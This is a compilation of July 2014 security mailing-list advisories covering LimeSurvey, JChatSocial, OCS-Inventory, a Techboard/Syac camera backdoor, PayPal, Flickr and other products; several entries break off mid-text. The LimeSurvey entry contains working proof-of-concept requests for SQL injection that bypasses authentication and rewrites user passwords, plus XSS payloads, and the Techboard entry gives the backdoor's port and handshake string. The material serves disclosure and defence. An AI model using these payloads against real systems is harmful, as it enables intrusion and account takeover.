Lime Survey 2-05+ Multiple Vulnerabilities
Lime Survey Multiple Vulnerabilities
===
[ADVISORY INFORMATION]
Title: Lime Survey Multiple Vulnerabilities
Discovery date: 02/07/2014
Release date: 03/07/2014
Vendor Homepage:www.limesurvey.org
Version:Lime Survey 2.05+ Build 140618
Tested with:MS SQL Server 2008
Credits:Giuseppe D'Amore
(http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
[VULNERABILITY INFORMATION]
Class: SQL Injection + XSS
Category: Web
[AFFECTED PRODUCTS]
This security vulnerability affects:
* Lime Survey 2.05+ Build 140618
[VULNERABILITY DETAILS]
Multi-Byte SQL Injection
As shown in frontend_helper.php:
**
function loadanswers()
{
global $surveyid;
global $thissurvey, $thisstep;
global $clienttoken;
$clang = Yii::app()-lang;
$scid=returnGlobal('scid',true);
if (Yii::app()-request-getParam('loadall') == reload)
{
$query = SELECT * FROM {{saved_control}} INNER JOIN
{$thissurvey['tablename']}
ON {{saved_control}}.srid = {$thissurvey['tablename']}.id
WHERE {{saved_control}}.sid=$surveyid\n;
if (isset($scid)) //Would only come from email
{
$query .= AND {{saved_control}}.scid={$scid}\n;
}
$query .=AND {{saved_control}}.identifier =
'.autoEscape($_SESSION['survey_'.$surveyid]['holdname']).' ;
**
the function autoEscape is applied on the holdname parameter, this function is
defined in the file common_helper.php
**
function autoEscape($str) {
if (!get_magic_quotes_gpc()) {
return addslashes ($str);
}
return $str;
}
**
addslashes can be bypassed using the GBK charset. So sending this request:
**
POST /limesurvey/index.php?r=survey/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/limesurvey/index.php?r=survey/index
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587;
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2loadname=chr(0x87) . '
OR 1=1 -- ;loadpass=testloadsecurity=89sid=713149loadall=reload
***
it is possible to bypass imcomplete survey authentication.
Stacked Query SQL Injection
---
Sending this request:
***
POST /limesurvey/index.php?r=admin/participants/sa/getParticipants_json HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/limesurvey/index.php?r=admin/participants/sa/displayParticipants
Content-Length: 141
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587;
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2searchcondition=_search=falsend=1404300424270rows=25page=1sidx=lastname];
update lime_users set
password='880e042d271f08cd3c456f28704702a6b0ad1c7b442f257bf40578112c8e6ffb';+--+Psord=asc
it is possible to change the users's password.
Reflected XSS
-
GET
/limesurvey/index.php?r=admin%2fparticipants%2fsa%2fgetAttribute_json%2fpid%2f9b0039e2-b346-473d-901f-7010d2bc88c16c2d4img%20src%3da%20onerror%3dalert(1)9b6d6fe2f71YII_CSRF_TOKEN=76fa68bdfde6a997ee64f01726234fd7897e2289_search=falsend=140420566784
GET
/limesurvey/index.php?r=admin/globalsettingssa=ascriptalert(1)/scripta
XSS via CSV
---
it is possible to create a .csv file with inside scriptalert(2)/script,0
and and upload it with the functionality Import CSV.
[DISCLOSURE TIME-LINE]
* 02/07/2014 - Initial vendor contact.
* 02/07/2014 - Lime Survey Team confirmed the issue is a new security
vulnerability.
* 02/07/2014 - Vendor has fixed this vulnerability on Git.
* 03/07/2014 - Public disclosure.
[DISCLAIMER]
The author is not
[SECURITY] [DSA 2972-1] linux security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2972-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso July 06, 2014 http://www.debian.org/security/faq - - Package: linux CVE ID : CVE-2014-4699 Andy Lutomirski discovered that the ptrace syscall was not verifying the RIP register to be valid in the ptrace API on x86_64 processors. An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation. For the stable distribution (wheezy), this problem has been fixed in version 3.2.60-1+deb7u1. In addition, this update contains several bugfixes originally targeted for the upcoming Wheezy point release. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your linux packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTuW7PAAoJEAVMuPMTQ89EryEP/3iUzWWveiBYU6GCWfFEqUMw 5BBcKFkNsxLbWWMXTpAShO9x1VPOQznddYA1qg5rMqvsNjoQFqKJN7d3tMjzYUi4 wVpYnBCsmskXHXYTlkr/43Iafn7v4J7796X6uZiUpvosqXJr6wBdqwo57KjL4IRc K0YlnmU6PrJ2scEEph/czP+c9o3f5MPGhw8YyHN0GFeQmLAc2JdrAZwKCD5Awloj CCH5Wh34km3v/y4HzBDeBeqxp8s610vre/+Crt4aD/HvAf7Dho/uyw1VR5D8vKHH eHvwVX9JYMAsDAuDd7j4xooTh4l9ts3NVivvLK/flFEj+1lLo+WEhZO+MvNt/lRH XOpHLNltAt7LHQZqh07RqJ/Ggf8ieotqiNSCUJJoJy+3FiVvSIvqYbsA0OmvbVY5 c97dxLJSZMjCnPpkMdn8Xh66HGznHbsmT436nngsoneejSpieViNRH4T9rskJylw 6epCTKW/aLbn2+Avju0b3H7s0teiafhWXfNuIk/q6tuu1WDYuqvhimxs94EVWtFz SynAiszxbjnOAGrvsy0EYM+5Kof/VUvPm2Q7supucXbcsVI3ffyEHKoqukAZhAs6 Lx4m6dYQQ3dzbubalFLBoklVqkIGV3+M6aXrLgdcGa+rRBee1+c4ZRXgHjKVAl2L dcifXWXUR3J/5gJbs2yq =Zy2b -END PGP SIGNATURE-
Re: Android KeyStore Stack Buffer Overflow (CVE-2014-3100)
Hi, We have just released an App to check if your device is affected by this bug: https://play.google.com/store/apps/details?id=com.actisec.keystorescanner Thanks. Arturo
CVE-2014-3863 - Stored XSS in JChatSocial
CVE-2014-3863 === Stored Cross-Site Scripting (XSS) (CWE-79) vulnerability in JChatSocial Joomla extension. Vendor === Joomla! Extensions Store Product === JChatSocial: the Joomla live chat JChatSocial is a powerful chat system for Joomla with a look so similar to Facebook chat and it's easy to install and configure. Users can choose to start a private chat or join a group conversation, all completely free of charge because data stream is processed on your server. In addition JChatSocial integrates with Skype software to start video calls directly within your Joomla! site, and has many advanced feature such as attachments exchange, avatars and more. - source: http://storejoomla.org/extensions/jchatsocial.html Affected versions === This vulnerability affects versions of JChatSocial version 2.2 and probably lower Solution === The vendor has fixed the issue within few ours after receiving the vulnerability details, on 29.05.2014 Reported by === This issue was reported to the vendor by Teodor Lupan following a responsible disclosure process. Severity === High Exploitability === Easy: no user interaction required Description === The discovered Stored Cross Site Scripting can be used by anonymous users (unregistered) or on some setups - registered users - to target any other user types, including (Joomla) administrators, and execute any XSS attack type - like steal their session ID. Vulnerability details: In an active JChat window, it is possible to upload a file and send it to any other connected user. An attacker could insert malicious JavaScript code into the 'filename' input parameter which will be included into the active chat window and executed by the browser of the target without user interaction. -- Teodor Lupan - LPT, CEH, OSCP Technical Director Strada Doamna Cheajna nr. 1-3, etaj 4, Birou 7, Sector 3, cod 31233, Bucureşti, România Tel/Fax: +4 021 316 05 65 Mobil: +4 0723 010 220 e-mail: teodor.lu...@safetech.ro Web: www.safetech.ro
iTunes 11.2.2 for Windows: completely outdated and vulnerable 3rd party libraries
Hi @ll, Apples current iTunes 11.2.2 for Windows comes with the following COMPLETELY outdated and vulnerable 3rd party libraries (as part of AppleApplicationSupport.msi): * libeay32.dll and ssleay32.dll 0.9.8d are more than SEVEN years old and have at least 27 unfixed CVEs! the current version is 0.9.8za, see http://www.openssl.org/news/ * libcurl.dll 7.16.2 is more than SEVEN years old and has at least 18 unfixed CVEs! the current version is 7.37.0; see http://curl.haxx.se/docs/security.html for the fixed vulnerabilities! * libxml2.dll 2.6.0.0 is more than TEN years old and has at least 17 unfixed CVEs! the current version is 2.9.1, for the latest vulnerability see CVE-2013-0339 * icuuc40.dll, icuin40.dll, icudt49.dll, libicuuc.dll and libicuin.dll 49.1.1 have at least 4 unfixed CVEs: CVE-2013-2419, CVE-2013-2383, CVE-2013-2384, CVE-2013-1569 Until Apples developers start to develop a sense for safety and security: stay away from their (Windows) software! regards Stefan Kanthak Timeline: ~ 2014-06-06informed vendor 2014-06-06vendor sent automated response ... no more reaction 2014-07-03requested status ... no answer 2014-07-07report published
{CVE-ID request} - OCS-Inventory-NG Multiple Stored Cross Site Scripting Vulnerabilities.
# Title: Multiple Stored Cross Site Scripting Vulnerabilities # Author: Madhu Akula # Vendor Homepage: http://www.ocsinventory-ng.org/en/ # Software Link: http://www.ocsinventory-ng.org/en/download/ # Tested on: Chrome, Mozilla Reporter Name : Madhu Akula Product : OCS-Inventory NG Version : All Versions Modules : OCS Reports Web Interface Tested On : Windows, Linux, Mac Browsers : Firefox, Chrome, IE and all other also Priority : High Severity: Critical Status : New Summary : Multiple Stored Cross Site Scripting Vulnerabilities leads to take over the User accounts Internal Network scanning and some advanced attacks Description : About Vulnerability : Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Impact : Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc. For more reference : https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Conclusion : By using this vulnerability attackers use some frame works like Beef, OWASP xenotix to exploit the victim browsers and he can able to install key loggers and some other malicious activities also and it's very high sever and affected to all fields and versions. Steps to Reproduce : (POC) I created a clear poc and the link is here, https://www.dropbox.com/s/7bbdv8o8q1faotk/ocsng_sxsss.ogv Mitigation : Fixed release in SVN References : http://packetstormsecurity.com/files/127295/OCS-Inventory-NG-Cross-Site-Scripting.html http://cxsecurity.com/issue/WLB-2014070004 http://www.securityfocus.com/bid/68292 http://irist.ir/exploits-1663.html Credit : Madhu Akula Information Security Researcher https://www.twitter.com/madhuakula
Backdoor access to Techboard/Syac devices
[ADVISORY INFORMATION] Title: Backdoor access to Techboard/Syac devices Discovery date: 02/04/2014 Release date: 07/07/2014 Advisory URL: http://blog.emaze.net/2014/07/backdoor-techboardsyac.html Credits:Roberto Paleari (@rpaleari), Luca Giancane (luca.gianc...@emaze.net) [VULNERABILITY INFORMATION] Class: Command execution, Authentication bypass [AFFECTED PRODUCTS] We confirm the presence of the security vulnerability on the following products/firmware versions: * Techboard/Syac DigiEye 3G (software version 3.19.30004) Other device models and firmware versions are probably also vulnerable, but they were not checked. [VULNERABILITY DETAILS] During a security assessment on one of our customers, we had the opportunity to analyze a Techboard/Syac DigiEye. The assessment led to the identification of a critical security vulnerability, described in the next paragraphs. More in detail, affected devices include a backdoor service listening on TCP port 7339. This service implements a challenge-response protocol to authenticate clients. After this step, clients are allowed to execute arbitrary commands on the device, with administrative (root) privileges. We would like to stress out that, to the best of our knowledge, end-users are not allowed to disable the backdoor service, nor to control the authentication mechanism. As vulnerable devices are still widely deployed on the Internet, we won't release the full details on the backdoor communication protocol. Instead, we just document the initial protocol handshake, in order to allow Techboard/Syac customers to identify vulnerable devices on their networks. Strictly speaking, the protocol handshake works as follows: 1. The client connects to port tcp/7339 of the vulnerable device and sends the string KNOCK-KNOCK-ANYONETHERE?, terminated with a NULL byte. 2. The server replies with a 12-byte response. First 8 bytes are a timestamp, while last 4 bytes are a magic number equal to 0x000aae60. 3. The timestamp provided by the server is then used to feed the challenge/response procedure. Together with this security advisory, we provide a Nmap NSE script to identify vulnerable devices. [REMEDIATION] We contacted Techboard/Syac on April 2nd, 2014 and provided them with the technical details of the vulnerability we found. The device vendor promptly replied back to our e-mails and, on April 9th, they confirmed a patched firmware version was going to be released to their customers. However, the patched firmware was not checked by Emaze. [COPYRIGHT] Copyright(c) Emaze Networks S.p.A 2014, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. [DISCLAIMER] Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.
PayPal Inc Bug Bounty #74 - Persistent Core Backend Vulnerability
Document Title: === PayPal Inc Bug Bounty #74 - Persistent Core Backend Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1278 PayPal Inc Security UID: cDc49dT Release Date: = 2014-06-04 Vulnerability Laboratory ID (VL-ID): 1278 Common Vulnerability Scoring System: 8.9 Product Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. ( Copy of the Homepage: www.paypal.com ) [ http://en.wikipedia.org/wiki/PayPal ] Abstract Advisory Information: == The Vulnerability Laboratory Research Team (Benjamin Kunz Mejri) discovered an application-side vulnerability in the official PayPal Inc ethernet portal backend application (api). Vulnerability Disclosure Timeline: == 2013-02-12: Researcher Notification Coordination (Benjamin Kunz Mejri) 2013-02-12: Vendor Notification (PayPal Inc Site Security Team - Bug Bounty Program) 2013-10-28: Vendor Response/Feedback (PayPal Inc Site Security Team - Bug Bounty Program) 2014-01-28: Vendor Fix/Patch (PayPal Inc - Develoepr Team - Reward: 1000$) 2014-07-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): PayPal Inc Product: Core Application 2014 Q2 Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: An application-side validation web vulnerability and a filter bypass has been discovered in the official PayPal Inc ethernet portal backend application (api). The filter bypass allows remote attackers to evade the regular parse and encode filter mechanism of the paypal inc online-service portal web-application. The persistent input validation vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable service. In a reverse analysis after several legal testings against the paypal inc infrastructure, we came to decision to test a new kind of scenario against the service api. Our team tried to blind evade and bypass the online service filter validation of the backend listings with main values of the profile. Means whenever a moderator or admin is watching the profile of the paypal inc db listed user in the ethernet, the persistent injected code executes. In the attack scenario we injected malicious test codes with scripts in the most attractive values of the paypal user profile database - `bank account owner/holder (cardholder)`, `name/surname`, `companyname` and of course the `account owner`. In the morning (2013-02-12) paypal responded with the following mail to us (review poc). The security risk of the application-side validation vulnerability in the security card system module is estimated as
Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass Persistent Vulnerability
Document Title: === Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass Persistent Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1050 PayPal Security UID: Pq115cey Release Date: = 2014-05-14 Vulnerability Laboratory ID (VL-ID): 1050 Common Vulnerability Scoring System: 4 Product Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: == The Vulnerability Laboratory Research Team has discovered a filter bypass persistent Web Vulnerability in the Paypal Inc core web application api. Vulnerability Disclosure Timeline: == 2013-08-15: Researcher Notification Coordination (Ateeq ur Rehman Khan) 2013-08-16: Vendor Notification (PayPal Site Security Team - Bug Bounty Program) 2013-12-22: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty Program) 2014-05-10: Vendor Fix/Patch (PayPal Developer Team - Reward: Bug Bounty) 2014-05-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A filter bypass and persistent script code injection vulnerability has been discovered in the official Paypal service application and common service api. The vulnerability allows an attacker to inject own malicious script codes in the vulnerable module on the application side (persistent). The vulnerability has been discovered in the Paypal MOS (Multi Order Shipping) Web Application (https://ship.paypal.com) and the vulnerability exists in the `Preset` module. While
Yahoo! Bug Bounty #25 Flickr API - Persistent Service Vulnerability
Document Title: === Yahoo! Bug Bounty #25 Flickr API - Persistent Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1132 Release Date: = 2014-07-06 Vulnerability Laboratory ID (VL-ID): 1132 Common Vulnerability Scoring System: 4.1 Product Service Introduction: === Flickr is an image hosting and video hosting website, and web services suite that was created by Ludicorp in 2004 and acquired by Yahoo 2005. In addition to being a popular website for users to share and embed personal photographs, and effectively an online community, the service is widely used by photo researchers and by bloggers to host images that they embed in blogs and social media. The Verge reported in March 2013 that Flickr had a total of 87 million registered members and more than 3.5 million new images uploaded daily. In August 2011 the site reported that it was hosting more than 6 billion images and this number continues to grow steadily according to reporting sources. Photos and videos can be accessed from Flickr without the need to register an account but an account must be made in order to upload content onto the website. Registering an account also allows users to create a profile page containing photos and videos that the user has uploaded and also grants the ability to add another Flickr user as a contact. For mobile users, Flickr has official mobile apps for iOS, Android, PlayStation Vita, and Windows Phone operating systems. (Copy of the Homepage: http://en.wikipedia.org/wiki/Flickr ) Abstract Advisory Information: == The Vulnerability Laboratory Research team discovered a persistent input validation web vulnerability in the official Yahoo Flickr! website web-application and api. Vulnerability Disclosure Timeline: == 2013-11-03: Researcher Notification Coordination (Ateeq ur Rehman Khan - Vulnerability Lab) 2013-11-04: Vendor Notification (Yahoo! Security Team - Bug Bounty Program) 2014-01-09: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Program) 2014-06-22: Vendor Fix/Patch (Yahoo! Developer Team - HackerOne Reward: 1000$) 2014-07-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Yahoo! Product: Flickr Web Application - YPL API 2013 Q3 Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A persistent input validation vulnerability has been discovered in the official Yahoo Flickr! website web-application and api. The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the online-service. The vulnerability is located in the flickr `invite` mail notification module. Remote attackers are able to inject payloads to the `message` value of the web-application notification service after the registration. The remote attacker can send invitation mails through the yahoo online-service module with manipulated message body context. The attack vector of the issue is located on the application-side and the request method to inject own malicious codes is POST. The security risk of the persistent remote web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1. Exploitation of the vulnerability requires low user interaction and a low privileged flickr web-application user account. Successful exploitation of the vulnerability result in session hijacking (customers), account steal via persistent web attack (mail), persistent phishing or persistent manipulation of notification mails module context. Vulnerable Service(s): [+] Yahoo! Flickr Vulnerable Module(s): [+] Invite (Invitation of Users) Vulnerable Module(s): [+] Notification Service (eMails) Vulnerable Parameter(s): [+] message (body) Proof of Concept (PoC): === The persistent input validation web vulnerability can be exploited by remote attackers with low privileged yahoo web application user account and low user interaction. For demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Flickr Message - Invitation Attachment Message Body tr style=mso-yfti-irow:1 td style=padding:1.5pt 1.5pt 1.5pt 1.5pt p class=MsoNormalspan style=font-size:10.0pt;font-family:Arial,sans-serif o:p/o:p/span/p /td /tr tr style=mso-yfti-irow:2 td style=border:solid #CC 1.0pt;mso-border-alt:solid #CC .75pt;
[SECURITY] CVE-2014-3503 Apache Syncope
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2014-3503: Insecure Random implementations used to generate passwords in Apache Syncope Severity: Major Vendor: The Apache Software Foundation Versions Affected: This vulnerability affects all versions of Apache Syncope 1.1.x prior to 1.1.8 'Ad libitum'. The 1.0.x releases are not affected. Description: A password is generated for a user in Apache Syncope under certain circumstances, when no existing password is found. However, the password generation code is relying on insecure Random implementations, which means that an attacker could attempt to guess a generated password. This has been fixed in revision: http://svn.apache.org/viewvc?view=revisionrevision=1596537 Migration: Syncope 1.0.x users are not affected by this issue. Syncope 1.1.x users should upgrade to 1.1.8 'Ad libitum' as soon as possible. References: http://syncope.apache.org/security.html -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQEcBAEBAgAGBQJTunsUAAoJEGe/gLEK1TmDj4AH/05J9ZOB/gyem18F9MTcG+PB tuX7EGemHCU+fyKeTetyGdhzZzdNquMA3mR4UXOEKH1Fok4LvkBWF+BoKMSY8DgY vtWcZUfdJFeUd1XpdUrW0D/GEbbIdmijkbVoAZ3703RMpRiDBiVBkaBr/tjC6tuf WUoBueRmNTkInBQhabaNYXvC0vyPA5ARhu1CprJ5QpA3aFoIEaVdlJTd+Mg58vJS tlwoyGIUEUY/pusBKaZDkTVAJhrOS9b5atjlqCPlT3kGUbQOYgRPPTihX+0CMIY2 JE4yUXR8Kx6tvgebtft2IoUp6oZdR+XqHnEe3Tv1UnSRmlHj6o+tTCBDMmm1YOY= =o17e -END PGP SIGNATURE-
Photo Org WonderApplications v8.3 iOS - File Include Vulnerability
Document Title:
===
Photo Org WonderApplications v8.3 iOS - File Include Vulnerability
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1277
Release Date:
=
2014-07-04
Vulnerability Laboratory ID (VL-ID):
1277
Common Vulnerability Scoring System:
7.1
Product Service Introduction:
===
Create great photo albums and video diaries with PhotoOrg. Keep your photo
album and video diary secured with passwords.
Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa,
Flickr and MySpace with family, friends
and business associates.
Photo Editor with the following ability:
-Over eleven photo effects
-Four different photo enhancer
-Rotate and flip photo
-Crop photo
-Change photo brightness
-Change photo Contrast
-Change photo saturation
-Change photo sharpness
-Draw on photo with different colors
-Write text on your photo
-Remove red eyes
-Whiten photo
-Remove blemish on photo
Features:
-view your pictures and videos using your browser
-upload your picture and video using your browser
-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace
-upload multiple pictures to Facebook, Twitter, Flickr and MySpace
-Keep your photo and videos organized the way you like it
-Keep your photo and video secured with password
-copy your photo and video from anywhere and paste them into the application
( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 )
Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a local file include
vulnerability in the official WonderApplications Photo Org v8.3 iOS
web-application.
Vulnerability Disclosure Timeline:
==
2014-07-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=
Published
Affected Product(s):
WonderApplications
Product: Photo Org L - iOS Mobile Application 8.3
Exploitation Technique:
===
Local
Severity Level:
===
High
Technical Details Description:
A local file include web vulnerability has been discovered in the official
WonderApplications Photo Org v8.3 iOS web-application.
The local file include web vulnerability allows remote attackers to
unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `uploadMedia`
(uploadfile) module. Remote attackers are able to inject
own files with malicious `filename` values in the `uploadMedia` POST method
request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file/folder list context next
to the vulnerable name/path value. The attacker is able
to inject the local file request by usage of the available `wifi interface` for
file exchange/share.
Remote attackers are also able to exploit the filename validation issue in
combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the
application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as
high with a cvss (common vulnerability scoring system)
count of 7.1. Exploitation of the local file include web vulnerability requires
no privileged web-application user account but low
user interaction. Successful exploitation of the local file include web
vulnerability results in mobile application or connected
device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WonderApplications - WiFi Share
Vulnerable Module(s):
[+] uploadMedia
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing
(http://localhost:[port-x]/)
Proof of Concept (PoC):
===
The local file inlcude web vulnerability can be exploited by remote attackers
with low privileged application user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: WonderApplications (Photo Video) - Index- Sub-Categories
htmlheadstyle type=text/css
ul {float:left; width:100%; padding:0; margin:0; list-style-type:none; }
a { float:left; width:6em; text-decoration:none; color:white;
background-color:purple; padding:0.2em 0.6em; border-right:1px solid white; }
a:hover {background-color:#ff3300} li {display:inline} table
ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities EMC Identifier: ESA-2014-064 CVE Identifier: CVE-2014-2513, CVE-2014-2514 Severity Rating: CVSS v2 Base Score: Refer below for scores for each CVE. Affected products: All EMC Documentum Content Server versions of 7.1 All EMC Documentum Content Server versions of 7.0 All EMC Documentum Content Server versions of 6.7 SP2 All EMC Documentum Content Server versions of 6.7 SP1 All EMC Documentum Content Server versions prior to 6.7 SP1 Summary: EMC Documentum Content Server contains fixes for privilege escalation vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. Details: EMC Documentum Content Server may be susceptible to the following privilege escalation vulnerabilities: CVE-2014-2513 Authenticated non-privileged users are allowed to execute arbitrary code with super user privileges via custom scripts. This is due to improper authorization checks being performed on the objects created. This could be potentially exploited to perform unauthorized actions on Content Server. o CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P) CVE-2014-2514 Authenticated non-privileged users are allowed to run save RPC commands with super user privileges on arbitrary objects. This is due to improper user authorization checks and object type checks being performed on these objects. This could be potentially exploited by a malicious authenticated non-privileged user to perform unauthorized actions on Content Server including executing arbitrary code. o CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P) Resolution: EMC recommends all customers upgrade to one of the versions listed below at the earliest opportunity. EMC Documentum Content Server version 7.1 P06 and later EMC Documentum Content Server version 7.0 P15 and later EMC Documentum Content Server version 6.7 SP2 P15 and later EMC Documentum Content Server version 6.7 SP1 P28 and later Link to remedies: Registered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is 